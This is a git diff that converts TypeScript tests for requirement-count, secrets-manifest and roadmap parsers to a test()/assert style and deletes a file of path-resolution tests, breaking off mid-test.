 // ═══════════════════════════════════════════════════════════════════════════
 // parseRequirementCounts tests
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log('\n=== parseRequirementCounts: full requirements file ===');
-{
+test('parseRequirementCounts: full requirements file', () => {
   const content = `# Requirements
 
 ## Active
@@ -1343,27 +1322,25 @@ console.log('\n=== parseRequirementCounts: full requirements file ===');
 `;
 
   const counts = parseRequirementCounts(content);
-  assertEq(counts.active, 3, 'active count');
-  assertEq(counts.validated, 2, 'validated count');
-  assertEq(counts.deferred, 1, 'deferred count');
-  assertEq(counts.outOfScope, 2, 'outOfScope count');
-  assertEq(counts.blocked, 1, 'blocked count');
-  assertEq(counts.total, 8, 'total is sum of active+validated+deferred+outOfScope');
-}
+  assert.deepStrictEqual(counts.active, 3, 'active count');
+  assert.deepStrictEqual(counts.validated, 2, 'validated count');
+  assert.deepStrictEqual(counts.deferred, 1, 'deferred count');
+  assert.deepStrictEqual(counts.outOfScope, 2, 'outOfScope count');
+  assert.deepStrictEqual(counts.blocked, 1, 'blocked count');
+  assert.deepStrictEqual(counts.total, 8, 'total is sum of active+validated+deferred+outOfScope');
+});
 
-console.log('\n=== parseRequirementCounts: null input returns all zeros ===');
-{
+test('parseRequirementCounts: null input returns all zeros', () => {
   const counts = parseRequirementCounts(null);
-  assertEq(counts.active, 0, 'null active');
-  assertEq(counts.validated, 0, 'null validated');
-  assertEq(counts.deferred, 0, 'null deferred');
-  assertEq(counts.outOfScope, 0, 'null outOfScope');
-  assertEq(counts.blocked, 0, 'null blocked');
-  assertEq(counts.total, 0, 'null total');
-}
+  assert.deepStrictEqual(counts.active, 0, 'null active');
+  assert.deepStrictEqual(counts.validated, 0, 'null validated');
+  assert.deepStrictEqual(counts.deferred, 0, 'null deferred');
+  assert.deepStrictEqual(counts.outOfScope, 0, 'null outOfScope');
+  assert.deepStrictEqual(counts.blocked, 0, 'null blocked');
+  assert.deepStrictEqual(counts.total, 0, 'null total');
+});
 
-console.log('\n=== parseRequirementCounts: empty sections return zero counts ===');
-{
+test('parseRequirementCounts: empty sections return zero counts', () => {
   const content = `# Requirements
 
 ## Active
@@ -1376,16 +1353,15 @@ console.log('\n=== parseRequirementCounts: empty sections return zero counts ===
 `;
 
   const counts = parseRequirementCounts(content);
-  assertEq(counts.active, 0, 'empty active');
-  assertEq(counts.validated, 0, 'empty validated');
-  assertEq(counts.deferred, 0, 'empty deferred');
-  assertEq(counts.outOfScope, 0, 'empty outOfScope');
-  assertEq(counts.blocked, 0, 'empty blocked');
-  assertEq(counts.total, 0, 'empty total');
-}
+  assert.deepStrictEqual(counts.active, 0, 'empty active');
+  assert.deepStrictEqual(counts.validated, 0, 'empty validated');
+  assert.deepStrictEqual(counts.deferred, 0, 'empty deferred');
+  assert.deepStrictEqual(counts.outOfScope, 0, 'empty outOfScope');
+  assert.deepStrictEqual(counts.blocked, 0, 'empty blocked');
+  assert.deepStrictEqual(counts.total, 0, 'empty total');
+});
 
-console.log('\n=== parseRequirementCounts: blocked status counting ===');
-{
+test('parseRequirementCounts: blocked status counting', () => {
   const content = `# Requirements
 
 ## Active
@@ -1410,13 +1386,12 @@ console.log('\n=== parseRequirementCounts: blocked status counting ===');
 `;
 
   const counts = parseRequirementCounts(content);
-  assertEq(counts.active, 3, 'active includes blocked items in Active section');
-  assertEq(counts.blocked, 3, 'blocked counts all blocked statuses across sections');
-  assertEq(counts.deferred, 1, 'deferred section count');
-}
+  assert.deepStrictEqual(counts.active, 3, 'active includes blocked items in Active section');
+  assert.deepStrictEqual(counts.blocked, 3, 'blocked counts all blocked statuses across sections');
+  assert.deepStrictEqual(counts.deferred, 1, 'deferred section count');
+});
 
-console.log('\n=== parseRequirementCounts: total is sum of all section counts ===');
-{
+test('parseRequirementCounts: total is sum of all section counts', () => {
   const content = `# Requirements
 
 ## Active
@@ -1450,20 +1425,18 @@ console.log('\n=== parseRequirementCounts: total is sum of all section counts ==
 `;
 
   const counts = parseRequirementCounts(content);
-  assertEq(counts.active, 1, 'one active');
-  assertEq(counts.validated, 2, 'two validated');
-  assertEq(counts.deferred, 3, 'three deferred');
-  assertEq(counts.outOfScope, 1, 'one outOfScope');
-  assertEq(counts.total, 7, 'total = 1 + 2 + 3 + 1');
-  assertEq(counts.total, counts.active + counts.validated + counts.deferred + counts.outOfScope, 'total is exact sum');
-}
+  assert.deepStrictEqual(counts.active, 1, 'one active');
+  assert.deepStrictEqual(counts.validated, 2, 'two validated');
+  assert.deepStrictEqual(counts.deferred, 3, 'three deferred');
+  assert.deepStrictEqual(counts.outOfScope, 1, 'one outOfScope');
+  assert.deepStrictEqual(counts.total, 7, 'total = 1 + 2 + 3 + 1');
+  assert.deepStrictEqual(counts.total, counts.active + counts.validated + counts.deferred + counts.outOfScope, 'total is exact sum');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // parseSecretsManifest / formatSecretsManifest tests
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log('\n=== parseSecretsManifest: full manifest with 3 keys ===');
-{
+test('parseSecretsManifest: full manifest with 3 keys', () => {
   const content = `# Secrets Manifest
 
 **Milestone:** M003
@@ -1507,37 +1480,36 @@ console.log('\n=== parseSecretsManifest: full manifest with 3 keys ===');
 
   const m = parseSecretsManifest(content);
 
-  assertEq(m.milestone, 'M003', 'manifest milestone');
-  assertEq(m.generatedAt, '2025-06-15T10:00:00Z', 'manifest generatedAt');
-  assertEq(m.entries.length, 3, 'three entries');
+  assert.deepStrictEqual(m.milestone, 'M003', 'manifest milestone');
+  assert.deepStrictEqual(m.generatedAt, '2025-06-15T10:00:00Z', 'manifest generatedAt');
+  assert.deepStrictEqual(m.entries.length, 3, 'three entries');
 
   // First entry
-  assertEq(m.entries[0].key, 'OPENAI_API_KEY', 'entry 0 key');
-  assertEq(m.entries[0].service, 'OpenAI', 'entry 0 service');
-  assertEq(m.entries[0].dashboardUrl, 'https://platform.openai.com/api-keys', 'entry 0 dashboardUrl');
-  assertEq(m.entries[0].formatHint, 'starts with sk-', 'entry 0 formatHint');
-  assertEq(m.entries[0].status, 'pending', 'entry 0 status');
-  assertEq(m.entries[0].destination, 'dotenv', 'entry 0 destination');
-  assertEq(m.entries[0].guidance.length, 3, 'entry 0 guidance count');
-  assertEq(m.entries[0].guidance[0], 'Go to https://platform.openai.com/api-keys', 'entry 0 guidance[0]');
-  assertEq(m.entries[0].guidance[2], 'Copy the key immediately — it won\'t be shown again', 'entry 0 guidance[2]');
+  assert.deepStrictEqual(m.entries[0].key, 'OPENAI_API_KEY', 'entry 0 key');
+  assert.deepStrictEqual(m.entries[0].service, 'OpenAI', 'entry 0 service');
+  assert.deepStrictEqual(m.entries[0].dashboardUrl, 'https://platform.openai.com/api-keys', 'entry 0 dashboardUrl');
+  assert.deepStrictEqual(m.entries[0].formatHint, 'starts with sk-', 'entry 0 formatHint');
+  assert.deepStrictEqual(m.entries[0].status, 'pending', 'entry 0 status');
+  assert.deepStrictEqual(m.entries[0].destination, 'dotenv', 'entry 0 destination');
+  assert.deepStrictEqual(m.entries[0].guidance.length, 3, 'entry 0 guidance count');
+  assert.deepStrictEqual(m.entries[0].guidance[0], 'Go to https://platform.openai.com/api-keys', 'entry 0 guidance[0]');
+  assert.deepStrictEqual(m.entries[0].guidance[2], 'Copy the key immediately — it won\'t be shown again', 'entry 0 guidance[2]');
 
   // Second entry
-  assertEq(m.entries[1].key, 'STRIPE_SECRET_KEY', 'entry 1 key');
-  assertEq(m.entries[1].service, 'Stripe', 'entry 1 service');
-  assertEq(m.entries[1].status, 'collected', 'entry 1 status');
-  assertEq(m.entries[1].formatHint, 'starts with sk_test_ or sk_live_', 'entry 1 formatHint');
-  assertEq(m.entries[1].guidance.length, 3, 'entry 1 guidance count');
+  assert.deepStrictEqual(m.entries[1].key, 'STRIPE_SECRET_KEY', 'entry 1 key');
+  assert.deepStrictEqual(m.entries[1].service, 'Stripe', 'entry 1 service');
+  assert.deepStrictEqual(m.entries[1].status, 'collected', 'entry 1 status');
+  assert.deepStrictEqual(m.entries[1].formatHint, 'starts with sk_test_ or sk_live_', 'entry 1 formatHint');
+  assert.deepStrictEqual(m.entries[1].guidance.length, 3, 'entry 1 guidance count');
 
   // Third entry
-  assertEq(m.entries[2].key, 'SUPABASE_URL', 'entry 2 key');
-  assertEq(m.entries[2].status, 'skipped', 'entry 2 status');
-  assertEq(m.entries[2].destination, 'vercel', 'entry 2 destination');
-  assertEq(m.entries[2].guidance.length, 2, 'entry 2 guidance count');
-}
+  assert.deepStrictEqual(m.entries[2].key, 'SUPABASE_URL', 'entry 2 key');
+  assert.deepStrictEqual(m.entries[2].status, 'skipped', 'entry 2 status');
+  assert.deepStrictEqual(m.entries[2].destination, 'vercel', 'entry 2 destination');
+  assert.deepStrictEqual(m.entries[2].guidance.length, 2, 'entry 2 guidance count');
+});
 
-console.log('\n=== parseSecretsManifest: single-key manifest ===');
-{
+test('parseSecretsManifest: single-key manifest', () => {
   const content = `# Secrets Manifest
 
 **Milestone:** M001
@@ -1556,15 +1528,14 @@ console.log('\n=== parseSecretsManifest: single-key manifest ===');
 `;
 
   const m = parseSecretsManifest(content);
-  assertEq(m.milestone, 'M001', 'single-key milestone');
-  assertEq(m.entries.length, 1, 'single entry');
-  assertEq(m.entries[0].key, 'DATABASE_URL', 'single entry key');
-  assertEq(m.entries[0].service, 'PostgreSQL', 'single entry service');
-  assertEq(m.entries[0].guidance.length, 2, 'single entry guidance count');
-}
+  assert.deepStrictEqual(m.milestone, 'M001', 'single-key milestone');
+  assert.deepStrictEqual(m.entries.length, 1, 'single entry');
+  assert.deepStrictEqual(m.entries[0].key, 'DATABASE_URL', 'single entry key');
+  assert.deepStrictEqual(m.entries[0].service, 'PostgreSQL', 'single entry service');
+  assert.deepStrictEqual(m.entries[0].guidance.length, 2, 'single entry guidance count');
+});
 
-console.log('\n=== parseSecretsManifest: empty/no-secrets manifest ===');
-{
+test('parseSecretsManifest: empty/no-secrets manifest', () => {
   const content = `# Secrets Manifest
 
 **Milestone:** M002
@@ -1572,13 +1543,12 @@ console.log('\n=== parseSecretsManifest: empty/no-secrets manifest ===');
 `;
 
   const m = parseSecretsManifest(content);
-  assertEq(m.milestone, 'M002', 'empty manifest milestone');
-  assertEq(m.generatedAt, '2025-06-15T14:00:00Z', 'empty manifest generatedAt');
-  assertEq(m.entries.length, 0, 'no entries in empty manifest');
-}
+  assert.deepStrictEqual(m.milestone, 'M002', 'empty manifest milestone');
+  assert.deepStrictEqual(m.generatedAt, '2025-06-15T14:00:00Z', 'empty manifest generatedAt');
+  assert.deepStrictEqual(m.entries.length, 0, 'no entries in empty manifest');
+});
 
-console.log('\n=== parseSecretsManifest: missing optional fields default correctly ===');
-{
+test('parseSecretsManifest: missing optional fields default correctly', () => {
   const content = `# Secrets Manifest
 
 **Milestone:** M004
@@ -1592,18 +1562,17 @@ console.log('\n=== parseSecretsManifest: missing optional fields default correct
 `;
 
   const m = parseSecretsManifest(content);
-  assertEq(m.entries.length, 1, 'one entry with missing fields');
-  assertEq(m.entries[0].key, 'SOME_API_KEY', 'key parsed');
-  assertEq(m.entries[0].service, 'SomeService', 'service parsed');
-  assertEq(m.entries[0].dashboardUrl, '', 'missing dashboardUrl defaults to empty string');
-  assertEq(m.entries[0].formatHint, '', 'missing formatHint defaults to empty string');
-  assertEq(m.entries[0].status, 'pending', 'missing status defaults to pending');
-  assertEq(m.entries[0].destination, 'dotenv', 'missing destination defaults to dotenv');
-  assertEq(m.entries[0].guidance.length, 1, 'guidance still parsed');
-}
+  assert.deepStrictEqual(m.entries.length, 1, 'one entry with missing fields');
+  assert.deepStrictEqual(m.entries[0].key, 'SOME_API_KEY', 'key parsed');
+  assert.deepStrictEqual(m.entries[0].service, 'SomeService', 'service parsed');
+  assert.deepStrictEqual(m.entries[0].dashboardUrl, '', 'missing dashboardUrl defaults to empty string');
+  assert.deepStrictEqual(m.entries[0].formatHint, '', 'missing formatHint defaults to empty string');
+  assert.deepStrictEqual(m.entries[0].status, 'pending', 'missing status defaults to pending');
+  assert.deepStrictEqual(m.entries[0].destination, 'dotenv', 'missing destination defaults to dotenv');
+  assert.deepStrictEqual(m.entries[0].guidance.length, 1, 'guidance still parsed');
+});
 
-console.log('\n=== parseSecretsManifest: all three status values parse ===');
-{
+test('parseSecretsManifest: all three status values parse', () => {
   for (const status of ['pending', 'collected', 'skipped'] as const) {
     const content = `# Secrets Manifest
 
@@ -1619,12 +1588,11 @@ console.log('\n=== parseSecretsManifest: all three status values parse ===');
 `;
 
     const m = parseSecretsManifest(content);
-    assertEq(m.entries[0].status, status, `status variant: ${status}`);
+    assert.deepStrictEqual(m.entries[0].status, status, `status variant: ${status}`);
   }
-}
+});
 
-console.log('\n=== parseSecretsManifest: invalid status defaults to pending ===');
-{
+test('parseSecretsManifest: invalid status defaults to pending', () => {
   const content = `# Secrets Manifest
 
 **Milestone:** M006
@@ -1639,11 +1607,10 @@ console.log('\n=== parseSecretsManifest: invalid status defaults to pending ==='
 `;
 
   const m = parseSecretsManifest(content);
-  assertEq(m.entries[0].status, 'pending', 'invalid status defaults to pending');
-}
+  assert.deepStrictEqual(m.entries[0].status, 'pending', 'invalid status defaults to pending');
+});
 
-console.log('\n=== parseSecretsManifest + formatSecretsManifest: round-trip ===');
-{
+test('parseSecretsManifest + formatSecretsManifest: round-trip', () => {
   const original = `# Secrets Manifest
 
 **Milestone:** M007
@@ -1678,32 +1645,30 @@ console.log('\n=== parseSecretsManifest + formatSecretsManifest: round-trip ==='
   const parsed2 = parseSecretsManifest(formatted);
 
   // Verify semantic equality after round-trip
-  assertEq(parsed2.milestone, parsed1.milestone, 'round-trip milestone');
-  assertEq(parsed2.generatedAt, parsed1.generatedAt, 'round-trip generatedAt');
-  assertEq(parsed2.entries.length, parsed1.entries.length, 'round-trip entry count');
+  assert.deepStrictEqual(parsed2.milestone, parsed1.milestone, 'round-trip milestone');
+  assert.deepStrictEqual(parsed2.generatedAt, parsed1.generatedAt, 'round-trip generatedAt');
+  assert.deepStrictEqual(parsed2.entries.length, parsed1.entries.length, 'round-trip entry count');
 
   for (let i = 0; i < parsed1.entries.length; i++) {
     const e1 = parsed1.entries[i];
     const e2 = parsed2.entries[i];
-    assertEq(e2.key, e1.key, `round-trip entry ${i} key`);
-    assertEq(e2.service, e1.service, `round-trip entry ${i} service`);
-    assertEq(e2.dashboardUrl, e1.dashboardUrl, `round-trip entry ${i} dashboardUrl`);
-    assertEq(e2.formatHint, e1.formatHint, `round-trip entry ${i} formatHint`);
-    assertEq(e2.status, e1.status, `round-trip entry ${i} status`);
-    assertEq(e2.destination, e1.destination, `round-trip entry ${i} destination`);
-    assertEq(e2.guidance.length, e1.guidance.length, `round-trip entry ${i} guidance length`);
+    assert.deepStrictEqual(e2.key, e1.key, `round-trip entry ${i} key`);
+    assert.deepStrictEqual(e2.service, e1.service, `round-trip entry ${i} service`);
+    assert.deepStrictEqual(e2.dashboardUrl, e1.dashboardUrl, `round-trip entry ${i} dashboardUrl`);
+    assert.deepStrictEqual(e2.formatHint, e1.formatHint, `round-trip entry ${i} formatHint`);
+    assert.deepStrictEqual(e2.status, e1.status, `round-trip entry ${i} status`);
+    assert.deepStrictEqual(e2.destination, e1.destination, `round-trip entry ${i} destination`);
+    assert.deepStrictEqual(e2.guidance.length, e1.guidance.length, `round-trip entry ${i} guidance length`);
     for (let j = 0; j < e1.guidance.length; j++) {
-      assertEq(e2.guidance[j], e1.guidance[j], `round-trip entry ${i} guidance[${j}]`);
+      assert.deepStrictEqual(e2.guidance[j], e1.guidance[j], `round-trip entry ${i} guidance[${j}]`);
     }
   }
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // LLM-style round-trip tests — realistic manifest variations
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log('\n=== LLM round-trip: extra whitespace ===');
-{
+test('LLM round-trip: extra whitespace', () => {
   // LLMs often produce inconsistent indentation and trailing spaces
   const messy = `# Secrets Manifest
 
@@ -1734,34 +1699,33 @@ console.log('\n=== LLM round-trip: extra whitespace ===');
   const formatted = formatSecretsManifest(parsed1);
   const parsed2 = parseSecretsManifest(formatted);
 
-  assertEq(parsed2.milestone, parsed1.milestone, 'whitespace round-trip milestone');
-  assertEq(parsed2.generatedAt, parsed1.generatedAt, 'whitespace round-trip generatedAt');
-  assertEq(parsed2.entries.length, parsed1.entries.length, 'whitespace round-trip entry count');
-  assertEq(parsed2.entries.length, 2, 'whitespace: two entries parsed');
+  assert.deepStrictEqual(parsed2.milestone, parsed1.milestone, 'whitespace round-trip milestone');
+  assert.deepStrictEqual(parsed2.generatedAt, parsed1.generatedAt, 'whitespace round-trip generatedAt');
+  assert.deepStrictEqual(parsed2.entries.length, parsed1.entries.length, 'whitespace round-trip entry count');
+  assert.deepStrictEqual(parsed2.entries.length, 2, 'whitespace: two entries parsed');
 
   for (let i = 0; i < parsed1.entries.length; i++) {
     const e1 = parsed1.entries[i];
     const e2 = parsed2.entries[i];
-    assertEq(e2.key, e1.key, `whitespace round-trip entry ${i} key`);
-    assertEq(e2.service, e1.service, `whitespace round-trip entry ${i} service`);
-    assertEq(e2.dashboardUrl, e1.dashboardUrl, `whitespace round-trip entry ${i} dashboardUrl`);
-    assertEq(e2.formatHint, e1.formatHint, `whitespace round-trip entry ${i} formatHint`);
-    assertEq(e2.status, e1.status, `whitespace round-trip entry ${i} status`);
-    assertEq(e2.destination, e1.destination, `whitespace round-trip entry ${i} destination`);
-    assertEq(e2.guidance.length, e1.guidance.length, `whitespace round-trip entry ${i} guidance length`);
+    assert.deepStrictEqual(e2.key, e1.key, `whitespace round-trip entry ${i} key`);
+    assert.deepStrictEqual(e2.service, e1.service, `whitespace round-trip entry ${i} service`);
+    assert.deepStrictEqual(e2.dashboardUrl, e1.dashboardUrl, `whitespace round-trip entry ${i} dashboardUrl`);
+    assert.deepStrictEqual(e2.formatHint, e1.formatHint, `whitespace round-trip entry ${i} formatHint`);
+    assert.deepStrictEqual(e2.status, e1.status, `whitespace round-trip entry ${i} status`);
+    assert.deepStrictEqual(e2.destination, e1.destination, `whitespace round-trip entry ${i} destination`);
+    assert.deepStrictEqual(e2.guidance.length, e1.guidance.length, `whitespace round-trip entry ${i} guidance length`);
     for (let j = 0; j < e1.guidance.length; j++) {
-      assertEq(e2.guidance[j], e1.guidance[j], `whitespace round-trip entry ${i} guidance[${j}]`);
+      assert.deepStrictEqual(e2.guidance[j], e1.guidance[j], `whitespace round-trip entry ${i} guidance[${j}]`);
     }
   }
 
   // Verify the parser correctly stripped trailing whitespace
-  assertEq(parsed1.milestone, 'M010', 'whitespace: milestone trimmed');
-  assertEq(parsed1.entries[0].key, 'OPENAI_API_KEY', 'whitespace: key trimmed');
-  assertEq(parsed1.entries[0].service, 'OpenAI', 'whitespace: service trimmed');
-}
+  assert.deepStrictEqual(parsed1.milestone, 'M010', 'whitespace: milestone trimmed');
+  assert.deepStrictEqual(parsed1.entries[0].key, 'OPENAI_API_KEY', 'whitespace: key trimmed');
+  assert.deepStrictEqual(parsed1.entries[0].service, 'OpenAI', 'whitespace: service trimmed');
+});
 
-console.log('\n=== LLM round-trip: missing optional fields ===');
-{
+test('LLM round-trip: missing optional fields', () => {
   // LLMs may omit Dashboard and Format hint lines entirely
   const minimal = `# Secrets Manifest
 
@@ -1789,32 +1753,31 @@ console.log('\n=== LLM round-trip: missing optional fields ===');
   const parsed1 = parseSecretsManifest(minimal);
 
   // Verify missing optional fields get defaults
-  assertEq(parsed1.entries[0].dashboardUrl, '', 'missing-optional: no dashboard → empty string');
-  assertEq(parsed1.entries[0].formatHint, '', 'missing-optional: no format hint → empty string');
-  assertEq(parsed1.entries[1].dashboardUrl, '', 'missing-optional: entry 2 no dashboard → empty string');
-  assertEq(parsed1.entries[1].formatHint, '', 'missing-optional: entry 2 no format hint → empty string');
+  assert.deepStrictEqual(parsed1.entries[0].dashboardUrl, '', 'missing-optional: no dashboard → empty string');
+  assert.deepStrictEqual(parsed1.entries[0].formatHint, '', 'missing-optional: no format hint → empty string');
+  assert.deepStrictEqual(parsed1.entries[1].dashboardUrl, '', 'missing-optional: entry 2 no dashboard → empty string');
+  assert.deepStrictEqual(parsed1.entries[1].formatHint, '', 'missing-optional: entry 2 no format hint → empty string');
 
   // Round-trip: formatter omits empty optional fields, re-parse preserves defaults
   const formatted = formatSecretsManifest(parsed1);
   const parsed2 = parseSecretsManifest(formatted);
 
-  assertEq(parsed2.entries.length, parsed1.entries.length, 'missing-optional round-trip entry count');
+  assert.deepStrictEqual(parsed2.entries.length, parsed1.entries.length, 'missing-optional round-trip entry count');
 
   for (let i = 0; i < parsed1.entries.length; i++) {
     const e1 = parsed1.entries[i];
     const e2 = parsed2.entries[i];
-    assertEq(e2.key, e1.key, `missing-optional round-trip entry ${i} key`);
-    assertEq(e2.service, e1.service, `missing-optional round-trip entry ${i} service`);
-    assertEq(e2.dashboardUrl, e1.dashboardUrl, `missing-optional round-trip entry ${i} dashboardUrl`);
-    assertEq(e2.formatHint, e1.formatHint, `missing-optional round-trip entry ${i} formatHint`);
-    assertEq(e2.status, e1.status, `missing-optional round-trip entry ${i} status`);
-    assertEq(e2.destination, e1.destination, `missing-optional round-trip entry ${i} destination`);
-    assertEq(e2.guidance.length, e1.guidance.length, `missing-optional round-trip entry ${i} guidance length`);
+    assert.deepStrictEqual(e2.key, e1.key, `missing-optional round-trip entry ${i} key`);
+    assert.deepStrictEqual(e2.service, e1.service, `missing-optional round-trip entry ${i} service`);
+    assert.deepStrictEqual(e2.dashboardUrl, e1.dashboardUrl, `missing-optional round-trip entry ${i} dashboardUrl`);
+    assert.deepStrictEqual(e2.formatHint, e1.formatHint, `missing-optional round-trip entry ${i} formatHint`);
+    assert.deepStrictEqual(e2.status, e1.status, `missing-optional round-trip entry ${i} status`);
+    assert.deepStrictEqual(e2.destination, e1.destination, `missing-optional round-trip entry ${i} destination`);
+    assert.deepStrictEqual(e2.guidance.length, e1.guidance.length, `missing-optional round-trip entry ${i} guidance length`);
   }
-}
+});
 
-console.log('\n=== LLM round-trip: extra blank lines ===');
-{
+test('LLM round-trip: extra blank lines', () => {
   // LLMs sometimes insert excessive blank lines between sections
   const blanky = `# Secrets Manifest
 
@@ -1858,42 +1821,40 @@ console.log('\n=== LLM round-trip: extra blank lines ===');
 
   const parsed1 = parseSecretsManifest(blanky);
 
-  assertEq(parsed1.entries.length, 2, 'blank-lines: two entries parsed');
-  assertEq(parsed1.milestone, 'M012', 'blank-lines: milestone parsed');
-  assertEq(parsed1.entries[0].key, 'API_KEY_ONE', 'blank-lines: first key');
-  assertEq(parsed1.entries[0].guidance.length, 2, 'blank-lines: first entry guidance count');
-  assertEq(parsed1.entries[1].key, 'API_KEY_TWO', 'blank-lines: second key');
-  assertEq(parsed1.entries[1].status, 'skipped', 'blank-lines: second entry status');
+  assert.deepStrictEqual(parsed1.entries.length, 2, 'blank-lines: two entries parsed');
+  assert.deepStrictEqual(parsed1.milestone, 'M012', 'blank-lines: milestone parsed');
+  assert.deepStrictEqual(parsed1.entries[0].key, 'API_KEY_ONE', 'blank-lines: first key');
+  assert.deepStrictEqual(parsed1.entries[0].guidance.length, 2, 'blank-lines: first entry guidance count');
+  assert.deepStrictEqual(parsed1.entries[1].key, 'API_KEY_TWO', 'blank-lines: second key');
+  assert.deepStrictEqual(parsed1.entries[1].status, 'skipped', 'blank-lines: second entry status');
 
   // Round-trip produces clean output
   const formatted = formatSecretsManifest(parsed1);
   const parsed2 = parseSecretsManifest(formatted);
 
-  assertEq(parsed2.entries.length, parsed1.entries.length, 'blank-lines round-trip entry count');
+  assert.deepStrictEqual(parsed2.entries.length, parsed1.entries.length, 'blank-lines round-trip entry count');
 
   for (let i = 0; i < parsed1.entries.length; i++) {
     const e1 = parsed1.entries[i];
     const e2 = parsed2.entries[i];
-    assertEq(e2.key, e1.key, `blank-lines round-trip entry ${i} key`);
-    assertEq(e2.service, e1.service, `blank-lines round-trip entry ${i} service`);
-    assertEq(e2.dashboardUrl, e1.dashboardUrl, `blank-lines round-trip entry ${i} dashboardUrl`);
-    assertEq(e2.formatHint, e1.formatHint, `blank-lines round-trip entry ${i} formatHint`);
-    assertEq(e2.status, e1.status, `blank-lines round-trip entry ${i} status`);
-    assertEq(e2.destination, e1.destination, `blank-lines round-trip entry ${i} destination`);
-    assertEq(e2.guidance.length, e1.guidance.length, `blank-lines round-trip entry ${i} guidance length`);
+    assert.deepStrictEqual(e2.key, e1.key, `blank-lines round-trip entry ${i} key`);
+    assert.deepStrictEqual(e2.service, e1.service, `blank-lines round-trip entry ${i} service`);
+    assert.deepStrictEqual(e2.dashboardUrl, e1.dashboardUrl, `blank-lines round-trip entry ${i} dashboardUrl`);
+    assert.deepStrictEqual(e2.formatHint, e1.formatHint, `blank-lines round-trip entry ${i} formatHint`);
+    assert.deepStrictEqual(e2.status, e1.status, `blank-lines round-trip entry ${i} status`);
+    assert.deepStrictEqual(e2.destination, e1.destination, `blank-lines round-trip entry ${i} destination`);
+    assert.deepStrictEqual(e2.guidance.length, e1.guidance.length, `blank-lines round-trip entry ${i} guidance length`);
   }
 
   // Verify the formatted output is cleaner (fewer consecutive blank lines)
   const consecutiveBlanks = formatted.match(/\n{4,}/g);
-  assertTrue(consecutiveBlanks === null, 'blank-lines: formatted output has no 4+ consecutive newlines');
-}
+  assert.ok(consecutiveBlanks === null, 'blank-lines: formatted output has no 4+ consecutive newlines');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // parseRoadmap: boundary map with embedded code fences (#468)
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log('\n=== parseRoadmap: boundary map with code fences (#468) ===');
-{
+test('parseRoadmap: boundary map with code fences (#468)', () => {
   const content = `# M001: Test
 
 **Vision:** Test
@@ -1922,10 +1883,10 @@ Consumes: nothing
   const r = parseRoadmap(content);
   const elapsed = Date.now() - start;
 
-  assertTrue(elapsed < 1000, `boundary map with code fences parsed in ${elapsed}ms (should be < 1s)`);
-  assertEq(r.slices.length, 2, 'code-fence roadmap: slice count');
+  assert.ok(elapsed < 1000, `boundary map with code fences parsed in ${elapsed}ms (should be < 1s)`);
+  assert.deepStrictEqual(r.slices.length, 2, 'code-fence roadmap: slice count');
   // Boundary map should still parse (may not capture perfectly with code fences, but must not hang)
-  assertTrue(r.boundaryMap.length >= 0, 'code-fence roadmap: boundary map parsed without hanging');
-}
+  assert.ok(r.boundaryMap.length >= 0, 'code-fence roadmap: boundary map parsed without hanging');
+});
 
-report();
+});
diff --git a/src/resources/extensions/gsd/tests/paths.test.ts b/src/resources/extensions/gsd/tests/paths.test.ts
deleted file mode 100644
index c27f01976..000000000
--- a/src/resources/extensions/gsd/tests/paths.test.ts
+++ /dev/null
@@ -1,113 +0,0 @@
-import { mkdtempSync, mkdirSync, rmSync, realpathSync } from "node:fs";
-import { join } from "node:path";
-import { tmpdir } from "node:os";
-import { spawnSync } from "node:child_process";
-
-import { gsdRoot, _clearGsdRootCache } from "../paths.ts";
-import { createTestContext } from "./test-helpers.ts";
-
-const { assertEq, assertTrue, report } = createTestContext();
-
-/** Create a tmp dir and resolve symlinks + 8.3 short names (macOS /var→/private/var, Windows RUNNER~1→runneradmin). */
-function tmp(): string {
-  const p = mkdtempSync(join(tmpdir(), "gsd-paths-test-"));
-  try { return realpathSync.native(p); } catch { return p; }
-}
-
-function cleanup(dir: string): void {
-  try { rmSync(dir, { recursive: true, force: true }); } catch { /* ignore */ }
-}
-
-function initGit(dir: string): void {
-  spawnSync("git", ["init"], { cwd: dir });
-  spawnSync("git", ["commit", "--allow-empty", "-m", "init"], { cwd: dir });
-}
-
-// ── tests ──────────────────────────────────────────────────────────────────
-
-{
-  // Case 1: .gsd exists at basePath — fast path
-  const root = tmp();
-  try {
-    mkdirSync(join(root, ".gsd"));
-    _clearGsdRootCache();
-    const result = gsdRoot(root);
-    assertEq(result, join(root, ".gsd"), "fast path: returns basePath/.gsd");
-  } finally { cleanup(root); }
-}
-
-{
-  // Case 2: .gsd exists at git root, cwd is a subdirectory
-  const root = tmp();
-  try {
-    initGit(root);
-    mkdirSync(join(root, ".gsd"));
-    const sub = join(root, "src", "deep");
-    mkdirSync(sub, { recursive: true });
-    _clearGsdRootCache();
-    const result = gsdRoot(sub);
-    assertEq(result, join(root, ".gsd"), "git-root probe: finds .gsd at git root from subdirectory");
-  } finally { cleanup(root); }
-}
-
-{
-  // Case 3: .gsd in an ancestor — walk-up finds it (git repo with no .gsd at root)
-  const root = tmp();
-  try {
-    // Init a git repo so git probe returns root — but put .gsd one level deeper
-    // to force the walk-up path: root/project/.gsd, cwd = root/project/src/deep
-    initGit(root);
-    const project = join(root, "project");
-    mkdirSync(join(project, ".gsd"), { recursive: true });
-    const deep = join(project, "src", "deep");
-    mkdirSync(deep, { recursive: true });
-    _clearGsdRootCache();
-    // git probe returns root (no .gsd there), so walk-up takes over and finds project/.gsd
-    const result = gsdRoot(deep);
-    assertEq(result, join(project, ".gsd"), "walk-up: finds .gsd in ancestor when git root has none");
-  } finally { cleanup(root); }
-}
-
-{
-  // Case 4: .gsd nowhere — fallback returns original basePath/.gsd
-  // Use an isolated git repo so we fully control the environment above basePath
-  const root = tmp();
-  try {
-    initGit(root);                          // git root = root, no .gsd anywhere
-    const sub = join(root, "src");
-    mkdirSync(sub, { recursive: true });
-    _clearGsdRootCache();
-    const result = gsdRoot(sub);
-    // git probe finds root (no .gsd), walk-up finds nothing → fallback = sub/.gsd
-    assertEq(result, join(sub, ".gsd"), "fallback: returns basePath/.gsd when .gsd not found anywhere");
-  } finally { cleanup(root); }
-}
-
-{
-  // Case 5: cache — second call returns same value without re-probing
-  const root = tmp();
-  try {
